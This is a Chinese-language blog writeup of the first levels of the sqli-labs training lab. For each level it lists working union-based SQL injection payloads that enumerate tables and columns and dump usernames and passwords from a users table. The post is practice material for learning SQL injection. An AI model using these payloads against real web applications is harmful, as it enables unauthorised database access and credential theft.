本文最后更新于:星期日, 五月 24日 2020, 8:14 晚上
sqli-labs writeup
刷刷sqli-labs ,学习下sql注入漏洞
环境是win10虚拟机, phpstudy搭建的
php版本:5.4.45
mysql版本:5.7.26
less-1
单引号闭合
payload:
获取表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
获取列名
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
获取字段内容
?id=0' union select 1,2,group_concat(0x3a,username,0x3a,password) from users --+
less-2
数字型注入,直接用union注入就可以了
payload:
获取表名
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
获取列名
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
获取字段内容
?id=0 union select 1,2,group_concat(0x3a,username,0x3a,password) from users
less-3
单引号加圆括号闭合
payload:
注入点探测:
?id=1') and 1=2 --+
获取列数量:
?id=1') order by 4 --+
获取表名:
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
获取列名:
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
获取数据:
?id=0') union select 1,2,group_concat(0x3a,username,0x3a,password) from users --+
less-4
本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!